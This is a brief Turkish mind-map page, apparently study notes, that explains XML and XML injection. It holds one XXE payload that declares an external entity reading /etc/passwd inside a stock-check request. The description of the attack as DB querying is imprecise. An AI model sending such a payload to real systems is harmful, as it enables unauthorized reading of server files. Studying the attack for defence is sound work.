Get Started. It's Free
or sign up with your email address
XML inj. by Mind Map: XML inj.

1. XML Nedir

1.1. veri iletimi icin evrensel bir dildir hazirlayan kisi tarafindan ozellestirilebilir

1.1.1. Mesela alici tarafa urun ismi, urun rengi, fiyati, ozellikleri gibi bircok ozellik eklenebilir ve ozellestirilebilir.

1.1.2. BU sebebten web servisleri bazi durumlarda xml kullanmalidir mesela stok sorgusu yapmak bizden aldigi araba marka modelini gostermek gibi.

2. XML injection nedir

2.1. Saldirgan kisinin DB uzerinde XML sorgusu calistirmasina ve DB icindeki verileri okumasina olanak saglar.

2.1.1. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck><productId>&xxe;</productId></stockCheck>

3. a